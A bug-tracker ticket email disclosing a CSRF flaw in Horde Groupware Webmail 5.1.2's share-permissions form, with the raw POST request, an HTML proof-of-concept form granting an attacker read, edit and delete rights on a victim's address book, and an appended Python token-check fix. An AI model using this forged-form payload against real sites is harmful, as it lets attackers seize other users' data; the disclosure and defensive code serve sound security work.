[Tickets #12804] CSRF in changing permissions functionality

noreply at bugs.horde.org
Mon Oct 28 23:18:33 UTC 2013


DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.

Ticket URL: http://bugs.horde.org/ticket/12804
------------------------------------------------------------------------------
  Ticket             | 12804
  Created By         | m.benetrix at e-secure.com.au
  Summary            | CSRF in changing permissions functionality
  Queue              | Horde Groupware Webmail Edition
  Version            | 5.1.2
  Type               | Bug
  State              | Unconfirmed
  Priority           | 3. High
  Milestone          |
  Patch              |
  Owners             |
------------------------------------------------------------------------------


m.benetrix at e-secure.com.au (2013-10-28 23:18) wrote:

I found another one, a CSRF while a change of permissions is requested. It was found that this form misses a unique token.

Request:
POST /horde/services/shares/edit.php HTTP/1.1
Host: victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: session=a0db6c30e697fe3da03f9f437a63bb3f
Content-Type: application/x-www-form-urlencoded
Content-Length: 252

actionID=editform&cid=37&app=turba&owner_input=kenedyK&u_names%5B%7C%7Cnew_input%5D=AttackerUserName&u_read%5B%7C%7Cnew_input%5D=on&u_edit%5B%7C%7Cnew_input%5D=on&u_delete%5B%7C%7Cnew_input%5D=on&g_names%5B%7C%7Cnew%5D=&save_and_finish=Save+and+Finish


PoC

<html>
   <body>
     <form action="www.victim.com/horde/services/shares/edit.php" method="POST">
       <input type="hidden" name="actionID" value="editform" />
       <input type="hidden" name="cid" value="37" />
       <input type="hidden" name="app" value="turba" />
       <input type="hidden" name="owner_input" value="kenedyK" />
       <input type="hidden" name="u_names[||new_input]" value="AttackerUserName" />
       <input type="hidden" name="u_read[||new_input]" value="on" />
       <input type="hidden" name="u_edit[||new_input]" value="on" />
       <input type="hidden" name="u_delete[||new_input]" value="on" />
       <input type="hidden" name="g_names[||new]" value="" />
       <input type="hidden" name="save_and_finish" value="Save and Finish" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
</html>


Conditions: The attacker must know the owner value, which is the victim's username, and the ID of the address book. Once he gets them, he can launch the attack.
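An added example, not part of the report or of Horde's code: a minimal Python stand-in for the edit.php handler that binds a per-session token to the form and rejects the report's exact POST body, which carries no token, while accepting the same body once the token from the real form is present. The session store, handle_share_edit and POC_BODY are constructed for the illustration.

```python
import hmac
import secrets
from urllib.parse import parse_qs

# Constructed stand-in for the server-side session (hypothetical, not Horde's API).
def new_session(user):
    return {"user": user, "csrf_token": secrets.token_hex(32)}

def render_token_field(session):
    # Hidden field the genuine edit form would carry; a cross-site form cannot read it.
    return '<input type="hidden" name="csrf_token" value="%s" />' % session["csrf_token"]

def handle_share_edit(session, body):
    """Return ("ok", grants) if the request is accepted, ("rejected", reason) otherwise."""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    submitted = form.get("csrf_token", "")
    expected = session["csrf_token"]
    # Constant-time comparison so the token cannot be recovered byte by byte via timing.
    if not submitted or not hmac.compare_digest(submitted.encode(), expected.encode()):
        return ("rejected", "missing or invalid CSRF token")
    # Only the permission-related fields are of interest to the caller.
    grants = {k: v for k, v in form.items() if k.startswith(("u_", "g_"))}
    return ("ok", grants)

# The request body from the report, parameter names kept exactly as posted.
POC_BODY = ("actionID=editform&cid=37&app=turba&owner_input=kenedyK"
            "&u_names%5B%7C%7Cnew_input%5D=AttackerUserName"
            "&u_read%5B%7C%7Cnew_input%5D=on&u_edit%5B%7C%7Cnew_input%5D=on"
            "&u_delete%5B%7C%7Cnew_input%5D=on&g_names%5B%7C%7Cnew%5D="
            "&save_and_finish=Save+and+Finish")

def demo():
    session = new_session("kenedyK")
    forged = handle_share_edit(session, POC_BODY)                 # rejected: no token
    legit = handle_share_edit(session, POC_BODY + "&csrf_token=" + session["csrf_token"])
    return forged, legit

if __name__ == "__main__":
    print(demo())
```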

